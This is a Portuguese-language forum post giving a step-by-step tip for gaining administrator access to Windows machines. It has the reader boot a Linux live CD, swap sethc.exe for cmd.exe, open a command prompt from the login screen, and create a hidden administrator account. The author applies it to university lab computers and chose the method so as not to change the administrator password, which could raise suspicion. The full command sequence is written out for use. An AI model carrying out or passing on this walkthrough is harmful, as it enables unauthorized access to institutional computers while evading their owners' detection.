Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Criando conta administrativa no windows

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Criando conta administrativa no windows

    Bom o que eu vo estar passando aqui vai ser como criar uma conta administrativa no windows através de um liveCD de alguma distribuição linux.

    Mas pra que isso?

    Eu curti essa técnica pq eu um computador com windows onde vc possui acesso limitado é um saco. Percebi isso no laboratório de informática da minha facul. Com essa técnica nós criaremos uma conta. Assim n precisaremos trocar a senha do admnistrador o que poderia causar alguma desconfiança. E depois de terminado o serviço basta deletá-la

    Vamos lá.

    Dê boot com o distribuição linux de sua preferencia.
    Agora que você está no terminal você precisa estar como root e montar a partição do windows
    Digite o seguinte comando:

    mount -t ntfs /dev/sda2 /mnt

    Lembrando que a parte /dev/sda2 pode variar e /mnt é onde vc quer q seja montado. Isso vai de vcs.

    Feito isso vá em Windows\System32

    O que iremos fazer é subistituir o arquivo sethc.exe (teclas de aderência) pelo cmd.exe

    Para isso digite:

    cp sethc.exe sethc.back (fazendo um back)

    cp cmd.exe sethc.exe

    reboot

    Pronto dê boot pelo windows. Agora na tela de login é onde está mágica. Lá é possível você utilizar as teclas de aderência. Para isso basta usar seus atalhos (Pressione Num Lock durante 8s; Aperte shift 5 vezes; Pressione shift durante 8s).

    A questão é que você alterou as teclas de aderência pelo cmd.exe. Então quando fizer isso....adivinhem? Pronto você tem o cmd na sua frente.

    Agora para cirar um novo usuário digite

    net user /add NovoUsuario

    net user NovoUsuario suasenha

    e para colocá-lo no groupo administrativo

    net localgroup Administradores /add NovoUsuario

    Reinicie e quando você voltar a tela de login estará lá seu usuário. Testado e aprovado por mim na minha facul xD. Espero que gostem. Segue um vídeo de como fazer utilizando o backtrack.

    [ame="http://www.youtube.com/watch?v=JUAcdfo4EtA&feature=player_embedded"]http://www.youtube.com/watch?v=JUAcdfo4EtA&feature=player_embedded[/ame]
    Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
    sigpic
X
Working...
X